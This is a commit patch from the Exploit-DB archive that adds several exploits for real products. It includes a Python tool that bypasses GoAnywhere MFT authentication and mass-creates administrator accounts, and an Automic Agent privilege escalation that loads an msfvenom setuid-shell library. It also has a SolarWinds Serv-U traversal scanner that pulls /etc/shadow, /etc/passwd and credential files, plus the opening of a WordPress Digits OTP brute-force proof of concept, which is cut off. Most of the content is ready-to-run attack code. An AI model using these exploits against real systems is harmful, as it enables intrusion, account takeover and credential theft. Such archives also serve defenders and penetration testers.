From c3b152279e29d5427af997886003f9873a9caf95 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Fri, 30 May 2025 00:16:26 +0000 Subject: [PATCH] DB: 2025-05-30 7 changes to exploits/shellcodes/ghdb Automic Agent 24.3.0 HF4 - Privilege Escalation Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal Campcodes Online Hospital Management System 1.0 - SQL Injection WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure --- exploits/multiple/remote/52308.py | 338 +++++++++++++++++++++++ exploits/multiple/remote/52309.txt | 13 + exploits/multiple/remote/52311.py | 408 ++++++++++++++++++++++++++++ exploits/multiple/webapps/52307.txt | 74 +++++ exploits/multiple/webapps/52312.txt | 72 +++++ exploits/windows/remote/52310.py | 85 ++++++ files_exploits.csv | 6 + 7 files changed, 996 insertions(+) create mode 100755 exploits/multiple/remote/52308.py create mode 100644 exploits/multiple/remote/52309.txt create mode 100755 exploits/multiple/remote/52311.py create mode 100644 exploits/multiple/webapps/52307.txt create mode 100644 exploits/multiple/webapps/52312.txt create mode 100755 exploits/windows/remote/52310.py diff --git a/exploits/multiple/remote/52308.py b/exploits/multiple/remote/52308.py new file mode 100755 index 000000000..8c18d1786 --- /dev/null +++ b/exploits/multiple/remote/52308.py @@ -0,0 +1,338 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# Exploit Title: Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass +# Date: 2025-05-25 +# Exploit Author: @ibrahimsql +# Exploit Author's github: https://github.com/ibrahimsql +# Vendor Homepage: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft +# Software Link: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft/free-trial +# Version: < 7.4.1 +# Tested on: Kali Linux 2024.1 +# CVE: CVE-2024-0204 +# Description: +# Fortra GoAnywhere MFT versions prior to 7.4.1 contain a critical authentication bypass vulnerability +# that allows unauthenticated attackers to create an administrator account by exploiting a path traversal +# vulnerability to access the initial account setup wizard. This exploit demonstrates two different +# path traversal techniques to maximize successful exploitation across various server configurations. +# +# References: +# - https://old.rapid7.com/blog/post/2024/01/23/etr-cve-2024-0204-critical-authentication-bypass-in-fortra-goanywhere-mft/ +# - https://www.tenable.com/blog/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-vulnerability +# - https://nvd.nist.gov/vuln/detail/cve-2024-0204 + +import argparse +import concurrent.futures +import os +import socket +import sys +from typing import List, Dict, Tuple, Optional, Union + +import requests +from bs4 import BeautifulSoup +from colorama import Fore, Style, init + +# Initialize colorama for cross-platform colored output +init(autoreset=True) + +# Disable SSL warnings +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + +# Constants +DEFAULT_TIMEOUT = 10 +MAX_THREADS = 10 +USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" +PRIMARY_EXPLOIT_PATH = "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml" +SECONDARY_EXPLOIT_PATH = "/goanywhere/..;/wizard/InitialAccountSetup.xhtml" + + +class Banner: + @staticmethod + def show(): + banner = f"""{Fore.CYAN} + ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ +██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ██╔═████╗╚════██╗██╔═████╗██║ ██║ +██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗██║██╔██║ █████╔╝██║██╔██║███████║ +██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝████╔╝██║██╔═══╝ ████╔╝██║╚════██║ +╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ╚██████╔╝███████╗╚██████╔╝ ██║ + ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚═╝ +{Style.RESET_ALL} +{Fore.GREEN}CVE-2024-0204 Exploit v1.0{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql{Style.RESET_ALL} +""" + print(banner) + + +class GoAnywhereExploit: + def __init__(self, username: str, password: str, timeout: int = DEFAULT_TIMEOUT): + self.username = username + self.password = password + self.timeout = timeout + self.headers = {"User-Agent": USER_AGENT} + self.vulnerable_targets = [] + self.non_vulnerable_targets = [] + self.error_targets = [] + + def check_target(self, target: str) -> Dict: + """ + Check if target is vulnerable to CVE-2024-0204 and attempt to create an admin account + + Args: + target: The target URL/domain to check + + Returns: + Dict containing result information + """ + result = { + "target": target, + "vulnerable": False, + "message": "", + "admin_created": False, + "error": None + } + + # Try primary exploit path first + primary_result = self._try_exploit_path(target, PRIMARY_EXPLOIT_PATH) + if primary_result["vulnerable"]: + return primary_result + + # If primary path failed, try secondary exploit path + print(f"{Fore.BLUE}[*] {Style.RESET_ALL}Primary exploit path failed, trying alternative path...") + secondary_result = self._try_exploit_path(target, SECONDARY_EXPLOIT_PATH) + if secondary_result["vulnerable"]: + return secondary_result + + # If both paths failed, target is not vulnerable + print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable to CVE-2024-0204") + result["message"] = "Not vulnerable to CVE-2024-0204" + self.non_vulnerable_targets.append(target) + return result + + def _try_exploit_path(self, target: str, exploit_path: str) -> Dict: + """ + Try to exploit the target using a specific exploit path + + Args: + target: Target to exploit + exploit_path: Path to use for exploitation + + Returns: + Dict with exploitation results + """ + result = { + "target": target, + "vulnerable": False, + "message": "", + "admin_created": False, + "error": None + } + + try: + url = f"https://{target}{exploit_path}" + session = requests.Session() + + # Initial check for vulnerability + response = session.get( + url, + headers=self.headers, + verify=False, + timeout=self.timeout + ) + + # Determine if target is vulnerable based on response + if response.status_code == 401: + print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable via {exploit_path} (401 Unauthorized)") + result["message"] = "Not vulnerable (401 Unauthorized)" + return result + + if response.status_code != 200: + print(f"{Fore.YELLOW}[?] {Style.RESET_ALL}{target} - Unexpected response via {exploit_path} (Status: {response.status_code})") + result["message"] = f"Unexpected response (Status: {response.status_code})" + return result + + # Target is potentially vulnerable + print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Potentially vulnerable via {exploit_path}!") + result["vulnerable"] = True + self.vulnerable_targets.append(target) + + # Extract ViewState token for the form submission + try: + soup = BeautifulSoup(response.text, "html.parser") + view_state = soup.find('input', {'name': 'javax.faces.ViewState'}) + + if not view_state or not view_state.get('value'): + print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Could not extract ViewState token via {exploit_path}") + result["message"] = "Could not extract ViewState token" + return result + + # Prepare data for admin account creation + data = { + "j_id_u:creteAdminGrid:username": self.username, + "j_id_u:creteAdminGrid:password_hinput": self.password, + "j_id_u:creteAdminGrid:password": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2", + "j_id_u:creteAdminGrid:confirmPassword_hinput": self.password, + "j_id_u:creteAdminGrid:confirmPassword": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2", + "j_id_u:creteAdminGrid:submitButton": "", + "createAdminForm_SUBMIT": 1, + "javax.faces.ViewState": view_state['value'] + } + + # Attempt to create admin account + create_response = session.post( + url, + headers=self.headers, + data=data, + verify=False, + timeout=self.timeout + ) + + if create_response.status_code == 200: + print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Admin account created successfully via {exploit_path}! Username: {self.username}, Password: {self.password}") + result["admin_created"] = True + result["message"] = f"Admin account created successfully! Username: {self.username}, Password: {self.password}" + else: + print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Failed to create admin account via {exploit_path} (Status: {create_response.status_code})") + result["message"] = f"Failed to create admin account (Status: {create_response.status_code})" + + except Exception as e: + print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error extracting form data: {str(e)}") + result["message"] = f"Error extracting form data: {str(e)}" + result["error"] = str(e) + + except requests.exceptions.ConnectTimeout: + print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection timeout") + result["message"] = "Connection timeout" + result["error"] = "Connection timeout" + self.error_targets.append(target) + + except requests.exceptions.ConnectionError: + print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection error") + result["message"] = "Connection error" + result["error"] = "Connection error" + self.error_targets.append(target) + + except Exception as e: + print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error: {str(e)}") + result["message"] = f"Error: {str(e)}" + result["error"] = str(e) + self.error_targets.append(target) + + return result + + def scan_targets(self, targets: List[str]) -> None: + """ + Scan multiple targets concurrently + + Args: + targets: List of targets to scan + """ + with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_THREADS) as executor: + executor.map(self.check_target, targets) + + def load_targets_from_file(self, file_path: str) -> List[str]: + """ + Load targets from a file + + Args: + file_path: Path to the file containing targets + + Returns: + List of targets + """ + if not os.path.exists(file_path): + print(f"{Fore.RED}[!] {Style.RESET_ALL}File not found: {file_path}") + return [] + + try: + with open(file_path, "r") as f: + return [line.strip() for line in f if line.strip()] + except Exception as e: + print(f"{Fore.RED}[!] {Style.RESET_ALL}Error reading file: {str(e)}") + return [] + + def print_summary(self) -> None: + """Print a summary of the scanning results""" + print(f"\n{Fore.CYAN}[*] {Style.RESET_ALL}Scan Summary:") + print(f"{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets: {len(self.vulnerable_targets)}") + print(f"{Fore.RED}[-] {Style.RESET_ALL}Non-vulnerable targets: {len(self.non_vulnerable_targets)}") + print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}Error targets: {len(self.error_targets)}") + + if self.vulnerable_targets: + print(f"\n{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets:") + for target in self.vulnerable_targets: + print(f" - {target}") + + +def validate_args(args): + """Validate command line arguments""" + if not args.target and not args.file: + print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify either a target (-t) or a file (-f)") + return False + + if args.file and not os.path.exists(args.file): + print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: File not found: {args.file}") + return False + + if not args.username or not args.password: + print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify both username (-u) and password (-p)") + return False + + return True + + +def main(): + """Main function""" + parser = argparse.ArgumentParser(description="CVE-2024-0204: Fortra GoAnywhere MFT Authentication Bypass Exploit") + + parser.add_argument('-t', '--target', help="Target host to check (e.g., 'example.com' or '192.168.1.1')") + parser.add_argument('-f', '--file', help="File containing targets, one per line") + parser.add_argument('-u', '--username', help="Username for the admin account to create") + parser.add_argument('-p', '--password', help="Password for the admin account to create") + parser.add_argument('--timeout', type=int, default=DEFAULT_TIMEOUT, help=f"Connection timeout in seconds (default: {DEFAULT_TIMEOUT})") + parser.add_argument('--threads', type=int, default=MAX_THREADS, help=f"Number of concurrent threads for scanning (default: {MAX_THREADS})") + + args = parser.parse_args() + + # Show banner + Banner.show() + + # Validate arguments + if not validate_args(args): + parser.print_help() + sys.exit(1) + + # Initialize exploit + exploit = GoAnywhereExploit( + username=args.username, + password=args.password, + timeout=args.timeout + ) + + # Handle single target + if args.target: + print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Checking single target: {args.target}") + exploit.check_target(args.target) + + # Handle targets from file + elif args.file: + targets = exploit.load_targets_from_file(args.file) + if not targets: + print(f"{Fore.RED}[!] {Style.RESET_ALL}No valid targets found in the file") + sys.exit(1) + + print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Loaded {len(targets)} targets from file") + print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Starting scan with {args.threads} threads...\n") + + exploit.scan_targets(targets) + + # Print summary + exploit.print_summary() + + +if __name__ == "__main__": + try: + main() + except KeyboardInterrupt: + print(f"\n{Fore.YELLOW}[!] {Style.RESET_ALL}Scan interrupted by user") + sys.exit(0) + except Exception as e: + print(f"{Fore.RED}[!] {Style.RESET_ALL}Unhandled error: {str(e)}") + sys.exit(1) \ No newline at end of file diff --git a/exploits/multiple/remote/52309.txt b/exploits/multiple/remote/52309.txt new file mode 100644 index 000000000..81d4d1c33 --- /dev/null +++ b/exploits/multiple/remote/52309.txt @@ -0,0 +1,13 @@ +# Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation +# Date: 26.05.2025 +# Exploit Author: Flora Schäfer +# Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation +# Version: <24.3.0 HF4, <21.0.13 HF1 +# Tested on: Linux +# CVE : CVE-2025-4971 + +1. Generate shared object file using msfvenom +$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so + +2. Run the ucxjlx6 executable as follows +$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep") \ No newline at end of file diff --git a/exploits/multiple/remote/52311.py b/exploits/multiple/remote/52311.py new file mode 100755 index 000000000..28be25c70 --- /dev/null +++ b/exploits/multiple/remote/52311.py @@ -0,0 +1,408 @@ +# Exploit Title: SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal +# Date: 2025-05-28 +# Exploit Author: @ibrahimsql +# Exploit Author's github: https://github.com/ibrahimsql +# Vendor Homepage: https://www.solarwinds.com/serv-u-managed-file-transfer-server +# Software Link: https://www.solarwinds.com/serv-u-managed-file-transfer-server/registration +# Version: <= 15.4.2 HF1 +# Tested on: Kali Linux 2024.1 +# CVE: CVE-2024-28995 +# Description: +# SolarWinds Serv-U was susceptible to a directory traversal vulnerability that would allow +# attackers to read sensitive files on the host machine. This exploit demonstrates multiple +# path traversal techniques to access Serv-U log files and other system files on both +# Windows and Linux systems. +# +# References: +# - https://nvd.nist.gov/vuln/detail/cve-2024-28995 +# - https://www.rapid7.com/blog/post/2024/06/11/etr-cve-2024-28995-trivially-exploitable-information-disclosure-vulnerability-in-solarwinds-serv-u/ +# - https://thehackernews.com/2024/06/solarwinds-serv-u-vulnerability-under.html + +# Requirements: urllib3>=1.26.0 , colorama>=0.4.4 , requests>=2.25.0 + + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import argparse +import concurrent.futures +import json +import os +import re +import sys +import time +from concurrent.futures import ThreadPoolExecutor, as_completed +from urllib.parse import urlparse + +import requests +from colorama import Fore, Back, Style, init + +# Initialize colorama +init(autoreset=True) + +# Disable SSL warnings +try: + import urllib3 + urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) +except ImportError: + pass + +BASE_DIR = os.path.dirname(os.path.abspath(__file__)) + +BANNER = rf''' +{Fore.CYAN} + ______ _______ ____ ___ ____ _ _ ____ ___ ___ ___ ____ + / ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \( _ )/ _ \ / _ \| ___| + | | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) / _ \ (_) | (_) |___ \ + | |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ (_) \__, |\__, |___) | + \____| \_/ |_____| |_____|\___/_____| |_| |_____\___/ /_/ /_/|____/ +{Fore.YELLOW} + SolarWinds Serv-U Directory Traversal Exploit +{Fore.RED} CVE-2024-28995 by @ibrahimsql +{Style.RESET_ALL} +''' + +class ScanResult: + def __init__(self, url, is_vulnerable=False, version=None, os_type=None, file_content=None, path=None): + self.url = url + self.is_vulnerable = is_vulnerable + self.version = version + self.os_type = os_type + self.file_content = file_content + self.path = path + self.timestamp = time.strftime("%Y-%m-%d %H:%M:%S") + + def to_dict(self): + return { + "url": self.url, + "is_vulnerable": self.is_vulnerable, + "version": self.version, + "os_type": self.os_type, + "path": self.path, + "timestamp": self.timestamp + } + +def print_banner(): + print(BANNER) + +def normalize_url(url): + """Normalize URL to ensure it has http/https protocol.""" + if not url.startswith('http'): + url = f"https://{url}" + return url.rstrip('/') + +def extract_server_version(headers): + """Extract Serv-U version from server headers if available.""" + if 'Server' in headers: + server_header = headers['Server'] + # Look for Serv-U version pattern + match = re.search(r'Serv-U/(\d+\.\d+\.\d+)', server_header) + if match: + return match.group(1) + return None + +def is_vulnerable_version(version): + """Check if the detected version is vulnerable (15.4.2 HF1 or lower).""" + if not version: + return None + + try: + # Split version numbers + major, minor, patch = map(int, version.split('.')) + + # Vulnerable if lower than 15.4.2 HF2 + if major < 15: + return True + elif major == 15: + if minor < 4: + return True + elif minor == 4: + if patch <= 2: # We're assuming patch 2 is 15.4.2 HF1 which is vulnerable + return True + except: + pass + + return False + +def get_request(url, timeout=15): + """Make a GET request to the specified URL.""" + try: + response = requests.get(url, verify=False, timeout=timeout, allow_redirects=False) + return response + except requests.RequestException as e: + return None + +def detect_os_type(content): + """Detect the operating system type from the file content.""" + if any(indicator in content for indicator in ["root:", "bin:x:", "daemon:", "/etc/", "/home/", "/var/"]): + return "Linux" + elif any(indicator in content for indicator in ["[fonts]", "[extensions]", "[Mail]", "Windows", "ProgramData", "Program Files"]): + return "Windows" + return None + +def get_default_payloads(): + """Return a list of directory traversal payloads specific to CVE-2024-28995.""" + return [ + # Windows payloads - Serv-U specific files + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log"}, + {"path": "/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/^&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt"}, + {"path": "/?InternalDir=\\..\\..\\..\\..\\ProgramData\\RhinoSoft\\Serv-U\\&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt2"}, + {"path": "/?InternalDir=../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt3"}, + {"path": "/?InternalDir=../../../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Deep"}, + + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUStartupLog.txt", "name": "Serv-U Startup Log Alt4"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.Log", "name": "Serv-U Log"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServULog.txt", "name": "Serv-U Log Alt"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUErrorLog.txt", "name": "Serv-U Error Log"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-ErrorLog.txt", "name": "Serv-U Error Log Alt"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.ini", "name": "Serv-U Config"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUAdmin.ini", "name": "Serv-U Admin Config"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=Users.txt", "name": "Serv-U Users"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=UserAccounts.txt", "name": "Serv-U User Accounts"}, + + # Verify Windows with various system files + {"path": "/?InternalDir=/../../../../windows&InternalFile=win.ini", "name": "Windows ini"}, + {"path": "/?InternalDir=\\..\\..\\..\\..\\windows&InternalFile=win.ini", "name": "Windows ini Alt"}, + {"path": "/?InternalDir=../../../../windows&InternalFile=win.ini", "name": "Windows ini Alt2"}, + {"path": "/?InternalDir=../../../../../../windows&InternalFile=win.ini", "name": "Windows ini Deep"}, + {"path": "/?InternalDir=/./../../../Windows/system.ini", "name": "Windows system.ini"}, + {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=drivers.ini", "name": "Windows drivers.ini"}, + {"path": "/?InternalDir=/./../../../Windows/System32/drivers/etc/&InternalFile=hosts", "name": "Windows hosts"}, + {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=config.nt", "name": "Windows config.nt"}, + {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=ntuser.dat", "name": "Windows ntuser.dat"}, + {"path": "/?InternalDir=/./../../../Windows/boot.ini", "name": "Windows boot.ini"}, + + # Verify Linux with various system files + {"path": "/?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd", "name": "Linux passwd"}, + {"path": "/?InternalDir=/../../../../etc^&InternalFile=passwd", "name": "Linux passwd Alt"}, + {"path": "/?InternalDir=\\..\\..\\..\\..\\etc/passwd", "name": "Linux passwd Alt2"}, + {"path": "/?InternalDir=../../../../etc&InternalFile=passwd", "name": "Linux passwd Alt3"}, + {"path": "/?InternalDir=../../../../../../etc&InternalFile=passwd", "name": "Linux passwd Deep"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=shadow", "name": "Linux shadow"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=hosts", "name": "Linux hosts"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=hostname", "name": "Linux hostname"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=issue", "name": "Linux issue"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=os-release", "name": "Linux os-release"} + ] + +def create_custom_payload(directory, filename): + """Create a custom payload with the specified directory and filename.""" + # Try both encoding styles + payloads = [ + {"path": f"/?InternalDir=/./../../../{directory}&InternalFile={filename}", "name": f"Custom {filename}"}, + {"path": f"/?InternalDir=/../../../../{directory}^&InternalFile={filename}", "name": f"Custom {filename} Alt"}, + {"path": f"/?InternalDir=\\..\\..\\..\\..\\{directory}&InternalFile={filename}", "name": f"Custom {filename} Alt2"} + ] + return payloads + +def load_wordlist(wordlist_path): + """Load custom paths from a wordlist file.""" + payloads = [] + try: + with open(wordlist_path, 'r') as f: + for line in f: + line = line.strip() + if line and not line.startswith('#'): + # Check if the line contains a directory and file separated by a delimiter + if ':' in line: + directory, filename = line.split(':', 1) + payloads.extend(create_custom_payload(directory, filename)) + else: + # Assume it's a complete path + payloads.append({"path": line, "name": f"Wordlist: {line[:20]}..."}) + return payloads + except Exception as e: + print(f"{Fore.RED}[!] Error loading wordlist: {e}{Style.RESET_ALL}") + return [] + +def scan_target(url, custom_payloads=None): + """Scan a target URL for the CVE-2024-28995 vulnerability.""" + url = normalize_url(url) + result = ScanResult(url) + + # Try to get server version first + try: + response = get_request(url) + if response and response.headers: + result.version = extract_server_version(response.headers) + vulnerable_version = is_vulnerable_version(result.version) + + if vulnerable_version is False: + print(f"{Fore.YELLOW}[*] {url} - Serv-U version {result.version} appears to be patched{Style.RESET_ALL}") + # Still continue scanning as version detection may not be reliable + except Exception as e: + pass + + # Get all payloads to try + payloads = get_default_payloads() + if custom_payloads: + payloads.extend(custom_payloads) + + # Try each payload + for payload in payloads: + full_url = f"{url}{payload['path']}" + try: + print(f"{Fore.BLUE}[*] Trying: {payload['name']} on {url}{Style.RESET_ALL}") + response = get_request(full_url) + + if response and response.status_code == 200: + content = response.text + + # Check if the response contains meaningful content + if len(content) > 100: # Arbitrary threshold to filter out error pages + os_type = detect_os_type(content) + if os_type: + result.is_vulnerable = True + result.os_type = os_type + result.file_content = content + result.path = payload['path'] + + print(f"{Fore.GREEN}[+] {Fore.RED}VULNERABLE: {url} - {payload['name']} - Detected {os_type} system{Style.RESET_ALL}") + + # Successful match - no need to try more payloads + return result + except Exception as e: + continue + + if not result.is_vulnerable: + print(f"{Fore.RED}[-] Not vulnerable: {url}{Style.RESET_ALL}") + + return result + +def scan_multiple_targets(targets, custom_dir=None, custom_file=None, wordlist=None): + """Scan multiple targets using thread pool.""" + results = [] + custom_payloads = [] + + # Add custom payloads if specified + if custom_dir and custom_file: + custom_payloads.extend(create_custom_payload(custom_dir, custom_file)) + + # Add wordlist payloads if specified + if wordlist: + custom_payloads.extend(load_wordlist(wordlist)) + + print(f"{Fore.CYAN}[*] Starting scan of {len(targets)} targets with {len(custom_payloads) + len(get_default_payloads())} payloads{Style.RESET_ALL}") + + # Use fixed thread count of 10 + with ThreadPoolExecutor(max_workers=10) as executor: + future_to_url = {executor.submit(scan_target, target, custom_payloads): target for target in targets} + + for future in as_completed(future_to_url): + try: + result = future.result() + results.append(result) + except Exception as e: + print(f"{Fore.RED}[!] Error scanning {future_to_url[future]}: {e}{Style.RESET_ALL}") + + return results + +def save_results(results, output_file): + """Save scan results to a JSON file.""" + output_data = [result.to_dict() for result in results] + + try: + with open(output_file, 'w') as f: + json.dump(output_data, f, indent=2) + print(f"{Fore.GREEN}[+] Results saved to {output_file}{Style.RESET_ALL}") + except Exception as e: + print(f"{Fore.RED}[!] Error saving results: {e}{Style.RESET_ALL}") + +def save_vulnerable_content(result, output_dir): + """Save the vulnerable file content to a file.""" + if not os.path.exists(output_dir): + os.makedirs(output_dir) + + # Create a safe filename from the URL + parsed_url = urlparse(result.url) + safe_filename = f"{parsed_url.netloc.replace(':', '_')}.txt" + output_path = os.path.join(output_dir, safe_filename) + + try: + with open(output_path, 'w') as f: + f.write(f"URL: {result.url}\n") + f.write(f"Path: {result.path}\n") + f.write(f"Version: {result.version or 'Unknown'}\n") + f.write(f"OS Type: {result.os_type or 'Unknown'}\n") + f.write(f"Timestamp: {result.timestamp}\n") + f.write("\n--- File Content ---\n") + f.write(result.file_content) + + print(f"{Fore.GREEN}[+] Saved vulnerable content to {output_path}{Style.RESET_ALL}") + except Exception as e: + print(f"{Fore.RED}[!] Error saving content: {e}{Style.RESET_ALL}") + +def main(): + parser = argparse.ArgumentParser(description="CVE-2024-28995 - SolarWinds Serv-U Directory Traversal Scanner") + parser.add_argument("-u", "--url", help="Target URL") + parser.add_argument("-f", "--file", help="File containing a list of URLs to scan") + parser.add_argument("-d", "--dir", help="Custom directory path to read (e.g., ProgramData/RhinoSoft/Serv-U/)") + parser.add_argument("-n", "--filename", help="Custom filename to read (e.g., Serv-U-StartupLog.txt)") + parser.add_argument("-w", "--wordlist", help="Path to wordlist containing custom paths to try") + parser.add_argument("-o", "--output", help="Output JSON file to save results") + + args = parser.parse_args() + + print_banner() + + # Validate arguments + if not args.url and not args.file: + parser.print_help() + print(f"\n{Fore.RED}[!] Error: Either -u/--url or -f/--file is required{Style.RESET_ALL}") + sys.exit(1) + + targets = [] + + # Get targets + if args.url: + targets.append(args.url) + + if args.file: + try: + with open(args.file, "r") as f: + targets.extend([line.strip() for line in f.readlines() if line.strip()]) + except Exception as e: + print(f"{Fore.RED}[!] Error reading file {args.file}: {e}{Style.RESET_ALL}") + sys.exit(1) + + # Deduplicate targets + targets = list(set(targets)) + + if not targets: + print(f"{Fore.RED}[!] No valid targets provided.{Style.RESET_ALL}") + sys.exit(1) + + print(f"{Fore.CYAN}[*] Loaded {len(targets)} target(s){Style.RESET_ALL}") + + # Set output file + output_file = args.output or f"cve_2024_28995_results_{time.strftime('%Y%m%d_%H%M%S')}.json" + + # Start scanning + results = scan_multiple_targets(targets, args.dir, args.filename, args.wordlist) + + # Process results + vulnerable_count = sum(1 for result in results if result.is_vulnerable) + + print(f"\n{Fore.CYAN}[*] Scan Summary:{Style.RESET_ALL}") + print(f"{Fore.CYAN}[*] Total targets: {len(results)}{Style.RESET_ALL}") + print(f"{Fore.GREEN if vulnerable_count > 0 else Fore.RED}[*] Vulnerable targets: {vulnerable_count}{Style.RESET_ALL}") + + # Save results + save_results(results, output_file) + + # Save vulnerable file contents + for result in results: + if result.is_vulnerable and result.file_content: + save_vulnerable_content(result, "vulnerable_files") + + print(f"\n{Fore.GREEN}[+] Scan completed successfully!{Style.RESET_ALL}") + +if __name__ == "__main__": + try: + main() + except KeyboardInterrupt: + print(f"\n{Fore.YELLOW}[!] Scan interrupted by user{Style.RESET_ALL}") + sys.exit(0) + except Exception as e: + print(f"\n{Fore.RED}[!] An error occurred: {e}{Style.RESET_ALL}") + sys.exit(1) \ No newline at end of file diff --git a/exploits/multiple/webapps/52307.txt b/exploits/multiple/webapps/52307.txt new file mode 100644 index 000000000..aa862ebaa --- /dev/null +++ b/exploits/multiple/webapps/52307.txt @@ -0,0 +1,74 @@ +# Exploit Title: WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing +# Google Dork: inurl:/wp-content/plugins/digits/ +# Date: 2025-04-30 +# Exploit Author: Saleh Tarawneh +# Vendor Homepage: https://digits.unitedover.com/ +# Version: < 8.4.6.1 +# CVE : CVE-2025-4094 + +""" +The Digits plugin for WordPress prior to version 8.4.6.1 is vulnerable to OTP brute-force attacks due to missing rate limiting. +An attacker can exploit this to bypass authentication or password reset by iterating over possible OTP values. + +This PoC targets the "Forgot Password" flow and automates the attack, which is the same concept that is valid for the registration flow. + +CWE-287: Improper Authentication +CVSS v3.1: 9.8 (Critical) +OWASP A2: Broken Authentication + +[Instructions] +1. Use a tool like Burp Suite or your browser’s developer tools to intercept the OTP verification request. +2. Copy the exact request parameters +3. Replace the placeholder values in the script with real data from the intercepted request. +4. Run the script to brute-force 4-digit OTPs (0000 to 9999) or you can change it to 6-digit. + +[Alternative Method – Burp Suite Pro] + +If you have Burp Suite Pro, you can perform the OTP brute-force attack manually: + +1. Intercept the OTP request using Burp 